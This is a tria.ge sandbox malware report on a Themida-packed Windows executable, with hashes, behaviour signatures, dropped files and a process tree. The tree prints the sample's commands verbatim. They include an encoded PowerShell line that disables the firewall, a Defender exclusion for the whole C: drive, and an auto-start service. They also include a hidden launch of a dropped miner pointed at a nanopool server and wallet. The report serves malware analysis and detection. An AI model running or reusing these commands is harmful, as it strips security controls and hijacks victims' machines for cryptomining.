Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

9

Static

static

1

dridex

windows10-2004-x64

9

Analysis

  • max time kernel
    87s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/03/2023, 18:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe

  • Size

    7.1MB

  • MD5

    68557640db8a8e7225375079c5b74f58

  • SHA1

    41b0182f4683af9ac1444393539cad5480379b4f

  • SHA256

    d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227

  • SHA512

    5253729192c55c74166ccc701e8440154970b8fc412b50b9d778f0bde9457e78babbe28c22e7384b5933f9406eb4ef0f6ce3031fe7284b5e29b775fc103e19e4

  • SSDEEP

    98304:93EiL1pkOfylVETSX8zBVOzbtscJeikbAF5:1l5bFi8NVbbPkF5

Score
9/10
evasionpersistencethemidatrojan

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Creates new service(s) 1 TTPs
    persistence
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Themida packer 26 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe
    "C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"U2V0LU5ldEZpcmV3YWxsUHJvZmlsZSAtUHJvZmlsZSBEb21haW4sUHVibGljLFByaXZhdGUgLUVuYWJsZWQgRmFsc2U=\")))"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3144
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "Add-MpPreference -ExclusionPath 'C:\'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4376
    • C:\Windows\system32\sc.exe
      sc create alina binpath=\"C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe\" start=auto
      2⤵
      • Launches sc.exe
      PID:1516
    • C:\Windows\system32\sc.exe
      sc start alina
      2⤵
      • Launches sc.exe
      PID:4768
  • C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe
    "C:\Users\Admin\AppData\Local\Temp\d50748b418dc352001f3d20921549268758f9d2edddd3fea484a98f83ebd3227.exe"
    1⤵
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Start-Process "-WindowStyle hidden" -FilePath \"C:\Windows\system32\r.exe\" "\"--algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 0\""
      2⤵
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3924
      • C:\Windows\system32\r.exe
        "C:\Windows\system32\r.exe" --algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 0
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:3248
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Start-Process "-WindowStyle hidden" -FilePath \"C:\Windows\system32\r.exe\" "\"--algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 0\""
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:3480
      • C:\Windows\system32\r.exe
        "C:\Windows\system32\r.exe" --algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 0
        3⤵
          PID:5000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process "-WindowStyle hidden" -FilePath \"C:\Windows\system32\r.exe\" "\"--algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 0\""
        2⤵
          PID:4836
          • C:\Windows\system32\r.exe
            "C:\Windows\system32\r.exe" --algo etchash --server etc-eu1.nanopool.org:19999 --user 0xC91bBf1cfc50B8a13341cbED66AC8A889AFe093e.rig1 -w 0
            3⤵
              PID:4612

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          f0d5a1fbaaca4c45dae188fc923fd695

          SHA1

          15993a3ca80fe46ea106454b3c8893c23988fc80

          SHA256

          b98f796e2088c39005eea9ee1682580abf60809aafe73714d00c88ec4dbfe1c8

          SHA512

          c95fc9aec153e124267a7d075b0723307b814a30274b3d7904aaaccff5c67c90ffca7e8f7f668f78baaa6174bff28d0ce8d417bb0c29d9c850f0498dc36db2a8

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          d6e4b5ceebccd8a56241844898613c4b

          SHA1

          73f3d91314f9d0cd74cd2499926f207cb63d8220

          SHA256

          47b5174bbaebcdf5f64c5b2b521e3822c8242ade3aba1dfa29b26ae7a970d967

          SHA512

          dc7980d5db1e6e53d94c490ee02fddb09d5a21d842f8ddc5ea8f4bcaf46b668dc8ca235ebbca12aa776a48843e044e4a81916a757401c17c1d9c3b1cbafbbe2e

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lutcfyjg.0j5.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Windows\System32\r.exe
          Filesize

          58.2MB

          MD5

          0abc545bc8a8a1990c557a847acacced

          SHA1

          e07426bc3912a9f074db94e424d3efb031394866

          SHA256

          c191df054a9390d7c7e4e13fc6a641a96a2909e18176485e415305b065a274cc

          SHA512

          200b411b0ee1a99ad7e145090b2ebbecee2c4cc9ca2883c867da50dda36ffe59263814fed249f01f9c06efd7706432463fdfbfafdcf0e8836a67b525f5a0951d

          Download Submit

        • C:\Windows\System32\r.exe
          Filesize

          58.2MB

          MD5

          0abc545bc8a8a1990c557a847acacced

          SHA1

          e07426bc3912a9f074db94e424d3efb031394866

          SHA256

          c191df054a9390d7c7e4e13fc6a641a96a2909e18176485e415305b065a274cc

          SHA512

          200b411b0ee1a99ad7e145090b2ebbecee2c4cc9ca2883c867da50dda36ffe59263814fed249f01f9c06efd7706432463fdfbfafdcf0e8836a67b525f5a0951d

          Download Submit

        • C:\Windows\System32\r.exe
          Filesize

          30.0MB

          MD5

          cec4a96581f9b04a6a475168f3237fa4

          SHA1

          1620a65eb044f49519cd6a1b9b754ec9b6725b14

          SHA256

          e3e435ab9ce098877dd56cc216432ff1d2d2866f0d24fc200bbec5839c236bb8

          SHA512

          0a32bc3e8c61b3cabf10c1563ce75351d21b017d4370bf58c1e9ef58e814f7f3f03e6c46411694d4240ec63f15cab18abb818df5409678d337f6c082f5058132

          Download Submit

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          6cf293cb4d80be23433eecf74ddb5503

          SHA1

          24fe4752df102c2ef492954d6b046cb5512ad408

          SHA256

          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

          SHA512

          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

          Download Submit

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          2238871af228384f4b8cdc65117ba9f1

          SHA1

          2a200725f1f32e5a12546aa7fd7a8c5906757bd1

          SHA256

          daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882

          SHA512

          1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

          Download Submit

        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          190cc2feb6fbf6a6143f296ebe043de5

          SHA1

          8fa72a99c46ed77b602476c85ca2d8ea251b22fb

          SHA256

          4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206

          SHA512

          94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

          Download Submit

        • C:\Windows\system32\r.exe
          Filesize

          58.2MB

          MD5

          0abc545bc8a8a1990c557a847acacced

          SHA1

          e07426bc3912a9f074db94e424d3efb031394866

          SHA256

          c191df054a9390d7c7e4e13fc6a641a96a2909e18176485e415305b065a274cc

          SHA512

          200b411b0ee1a99ad7e145090b2ebbecee2c4cc9ca2883c867da50dda36ffe59263814fed249f01f9c06efd7706432463fdfbfafdcf0e8836a67b525f5a0951d

          Download Submit

        • memory/3144-148-0x000001A27C610000-0x000001A27C620000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3144-133-0x000001A27F4B0000-0x000001A27F4D2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3144-147-0x000001A27F9A0000-0x000001A27F9BA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/3144-146-0x000001A27F970000-0x000001A27F97E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/3144-145-0x000001A27C610000-0x000001A27C620000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3144-143-0x000001A27C610000-0x000001A27C620000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3144-144-0x000001A27C610000-0x000001A27C620000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3248-187-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3248-186-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3248-184-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3248-188-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3248-189-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3248-190-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3248-191-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3248-192-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3248-183-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3248-182-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/3480-194-0x000001ABF0970000-0x000001ABF0980000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3480-200-0x000001ABF0970000-0x000001ABF0980000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3924-176-0x00000158FC560000-0x00000158FC570000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3924-177-0x00000158FC560000-0x00000158FC570000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3924-175-0x00000158FC560000-0x00000158FC570000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4612-236-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/4612-235-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/4836-232-0x000001D5C7B20000-0x000001D5C7B30000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4836-231-0x000001D5C7B20000-0x000001D5C7B30000-memory.dmp

          Filesize

          64KB

          Download

        • memory/4836-230-0x000001D5C7B20000-0x000001D5C7B30000-memory.dmp

          Filesize

          64KB

          Download

        • memory/5000-213-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/5000-217-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/5000-218-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/5000-216-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/5000-215-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/5000-214-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/5000-208-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/5000-212-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/5000-210-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download

        • memory/5000-209-0x00007FF76EE50000-0x00007FF7734FC000-memory.dmp

          Filesize

          70.7MB

          Download